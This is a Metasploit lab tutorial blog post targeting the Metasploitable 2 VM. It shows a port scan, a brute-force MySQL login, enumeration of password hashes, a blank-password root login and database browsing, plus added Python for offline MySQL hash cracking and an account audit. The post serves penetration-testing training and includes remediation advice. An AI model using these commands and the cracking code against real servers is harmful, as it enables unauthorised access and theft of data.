METASPLOIT-FINDING AND EXPLOITING A MYSQL USER ACCOUNT - HACK.ME
Sunday, July 24, 2016


dzaa

Welcome everyone to a great edition of MetaSploit 101. Today I will be talking about how you can use MetaSploit to identify a host that has an open instance of MySQL. We will then brute force the host looking for credentials we can use to log in, and lastly we’ll close by examining the database and pulling out some credit card data. Before we get started though, I gotta share a disclaimer:
This will take advantage of Rapid7’s Metasploitable 2 virtual machine as our target in an isolated test environment. Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. This type of activity should NOT be attempted against a host or hosts which you do not own or have written permission to perform a security audit against. I cannot and will not be held responsible for unauthorized or unlawful use of the information provided in this article. It is the sole responsibility of the user to ensure that they have the express permission of the owner of the target host to perform this or any other security audit, penetration test, or similar activity.
So with that out of the way, let’s get started! For the purpose of this, we’ll assume we already have our target host identified.
So first things first, let’s boot up MetaSploit in Kali Linux. We can do this by first starting the necessary services and then by opening the MetaSploit-Framework Console:

service postgresql start
service metasploit start
msfconsole

Note that on Kali 2.0 and later there is no metasploit service any more: run msfdb init once (it starts PostgreSQL and creates the framework database) and then launch msfconsole. Either way, check that the console is connected to the database with db_status before going further, because the services and creds commands used below only store and display results when the database is up.

[Screenshot: MetaSploit Framework Console]
Now that we have MetaSploit started, let’s identify what possible vectors we may have at our disposal. To do this, we’ll load the TCP port scanner:

use auxiliary/scanner/portscan/tcp
Now we need to set a few variables so that MetaSploit does what we want. Specifically, we’re going to set the host we would like to run the port scan against and we will raise the number of concurrent threads. To view what variables can be set, simply run show options. By default the module scans ports 1-10000; set PORTS if you need a different range.
To set our victim machine, we’ll set the RHOSTS variable, and we’ll set the number of threads with THREADS. Once those are set, we’ll begin the scan with run:

set RHOSTS 172.16.173.128
set THREADS 256
run
Some things to remember when setting THREADS on your personal machine though are:
  • Keep the THREADS value under 16 on native Win32 systems
  • Keep THREADS under 200 when running MSF under Cygwin
  • On Unix-like operating systems, THREADS can be set to 256.
Once this finishes, we’ll be presented with a list of open ports:
[Screenshot: TCP Port Scan Results]
From experience, we know that port 3306 is used for MySQL, but let’s verify this by checking what that port is with the services command, using the -c flag to limit our information to the name of the service, port number and protocol (note that there are no spaces between name, port and proto below):

services -p 3306 -c name,port,proto

[Screenshot: Services Port Output]
If we didn’t know this though, we could also search for our service of interest like so:

services -s mysql

[Screenshot: Services Search Output]
Now that we know that our target has MySQL open, let’s try to find credentials to get in. To do this, we’ll switch over to the mysql_login scanner:

use auxiliary/scanner/mysql/mysql_login
To use this module, we need to set a few things similar to what we did with the TCP scanner. You can view the available variables with show options. We set the following options:
  • BLANK_PASSWORDS, which tells MetaSploit to try a blank password for each user in our list
  • USERPASS_FILE, a file with one space-separated username and password pair per line
  • RHOSTS to 172.16.173.128
  • THREADS to speed up execution
  • STOP_ON_SUCCESS which, as the name implies, stops guessing against a host once we get a hit.
We’ll set the following values and start the scan with run:

set BLANK_PASSWORDS true
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set RHOSTS 172.16.173.128
set THREADS 256
set STOP_ON_SUCCESS true
run

A THREADS value of 256 is sized for sweeping a whole range; against a single host a handful of threads is plenty and far less disruptive.
Once that completes, we can run the creds command to see what we found:

[Screenshot: Located Credentials]
OK, so we found that the remote MySQL instance has a root user with what would appear to be a blank password. Because MySQL keeps its accounts (with their password hashes and privileges) in the user table of its own mysql database, now that we have root we can list every other account on that server without the inefficiency of this type of brute force attack. We’ll do this using the MySQL Enumerator module:
use auxiliary/admin/mysql/mysql_enum
As you would guess, we have to set a few options (note that this time the option is RHOST, not RHOSTS: admin modules of this vintage take a single target, whereas current Metasploit releases accept RHOSTS everywhere):
set RHOST 172.16.173.128
set USERNAME root
With those two items set (leaving the PASSWORD option unset, because the login scan found that root has an empty password; had it found a real one we would set it here) we can start our enumeration scan.
run

[Screenshot: MySQL Enumeration Result]
We see we got a lot of information from this: the enumerator prints the accounts in mysql.user along with their password hashes and privileges, plus a set of server settings. We can do another check of our creds command to see what we got from this:

[Screenshot: Credentials]
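The last two steps are worth understanding one level below Metasploit, because that explains both why BLANK_PASSWORDS is a separate switch in mysql_login and what to do with the hashes mysql_enum just pulled. With mysql_native_password the client proves knowledge of the password by sending SHA1(pw) XOR SHA1(scramble + SHA1(SHA1(pw))), where the scramble is the 20-byte salt from the server greeting; an account with no password is stored as an empty Password column and answered with an empty proof, not with a hash of the empty string. The stored form in mysql.user (MySQL 4.1 through 5.7) is '*' followed by SHA1(SHA1(pw)) in upper-case hex, which is unsalted, so once mysql_enum has handed you the hashes you can test a wordlist against them offline instead of sending more guesses at the server. The Python below is an added example, not code from the original post or from Metasploit: it implements both halves of the authentication exchange, an offline hash check, and the account audit a practitioner would run over the enumerated rows. The SAMPLE_USERS rows, the account names in them and the demo scramble are constructed; the hash for 'mypass' is the reference value printed in the MySQL manual.

```python
"""Offline view of MySQL 4.1-5.7 password handling and an audit of mysql.user.

Added example (not from the original post, not Metasploit code). SAMPLE_USERS
and DEMO_SCRAMBLE are constructed; the 'mypass' hash is the value shown in
the MySQL reference manual for PASSWORD('mypass').
"""
import hashlib
from typing import Dict, Iterable, List, Optional


def mysql41_hash(password: str) -> str:
    """PASSWORD() as stored in mysql.user: '*' + hex(SHA1(SHA1(pw))).

    PASSWORD('') is the empty string, so a blank-password account has an
    empty Password column rather than a hash of ''.
    """
    if password == "":
        return ""
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(stage1).hexdigest().upper()


def client_proof(password: str, scramble: bytes) -> bytes:
    """What a mysql_native_password client sends after the greeting:
    SHA1(pw) XOR SHA1(scramble + SHA1(SHA1(pw))). Empty password -> empty proof."""
    if password == "":
        return b""
    if len(scramble) != 20:
        raise ValueError("scramble must be the 20-byte salt from the greeting")
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mixed = hashlib.sha1(scramble + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mixed))


def server_accepts(stored: str, scramble: bytes, proof: bytes) -> bool:
    """Server side: undo the XOR with its own SHA1(scramble + stage2), then
    check that SHA1 of the recovered stage1 equals the stored stage2."""
    if stored == "":
        return proof == b""          # no-password account: only a blank proof
    if len(proof) != 20:
        return False
    stage2 = bytes.fromhex(stored[1:])
    mixed = hashlib.sha1(scramble + stage2).digest()
    stage1 = bytes(a ^ b for a, b in zip(proof, mixed))
    return hashlib.sha1(stage1).digest() == stage2


def crack_offline(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """First candidate whose PASSWORD() equals the stored hash, or None.
    No salt and two SHA1s per guess, so this is cheap to run locally."""
    target = stored.strip().upper()
    for candidate in wordlist:
        if mysql41_hash(candidate) == target:
            return candidate
    return None


RISKY_PRIVS = ("File_priv", "Super_priv", "Grant_priv")


def audit_users(rows: List[Dict[str, str]]) -> List[str]:
    """Flag the weaknesses that made this walkthrough work, over rows shaped
    like SELECT User, Host, Password, *_priv FROM mysql.user."""
    findings = []
    for r in rows:
        who = f"{r['User'] or '<anonymous>'}@{r['Host']}"
        if r.get("Password", "") == "":
            findings.append(f"{who}: blank password")
        if r["User"] == "":
            findings.append(f"{who}: anonymous account")
        if r["Host"] in ("%", ""):
            findings.append(f"{who}: may connect from any host")
        for priv in RISKY_PRIVS:
            if r.get(priv) == "Y":
                findings.append(f"{who}: holds {priv}")
    return findings


# Constructed sample rows (not a dump of a real server)
SAMPLE_USERS = [
    {"User": "root", "Host": "%", "Password": "", "File_priv": "Y",
     "Super_priv": "Y", "Grant_priv": "Y"},
    {"User": "app", "Host": "localhost",
     "Password": "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4",   # PASSWORD('mypass')
     "File_priv": "N"},
    {"User": "", "Host": "localhost", "Password": "", "File_priv": "N"},
]

SMALL_WORDLIST = ["123456", "password", "mypass", "root"]
DEMO_SCRAMBLE = b"0123456789abcdefghij"   # stands in for the greeting salt
```

The hashes mysql_enum prints can be fed straight into crack_offline (or a real cracker) while the server sees nothing; audit_users is the same triage you would do by eye over the enumerator output, and its findings double as the remediation list.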
Great! We have the information we need to connect to the database. Let’s exit MetaSploit and connect to the remote host’s MySQL instance with the command-line client (no -p is needed because root has no password):

exit # to exit MetaSploit
mysql -u root -h 172.16.173.128
We’re in! Now let’s see what databases we have at our disposal:

show databases;

[Screenshot: show databases output]
It’s worth noting that the mysql database listed here is the one our mysql_enum module read to collect the user and password information for us. We can work through these to see what each database contains using the following command (the example will use the owasp10 database):

show tables from owasp10;
We quickly see some stuff of interest in this database:

[Screenshot: show tables from owasp10 output]

Congratulations! You’ve just found some information on your victim machine! We saw here an example of how a malicious user could gain access to a MySQL database by taking advantage of weak credentials on the victim’s machine. The fix is as simple as the attack: give root (and every other account) a real password, drop anonymous accounts, and either bind MySQL to 127.0.0.1 or firewall port 3306 so the listener is never reachable from the network in the first place.

METASPLOIT-FINDING AND EXPLOITING A MYSQL USER ACCOUNT, reviewed by Vipula Dissanayake on 5:48:00 PM. Rating: 5
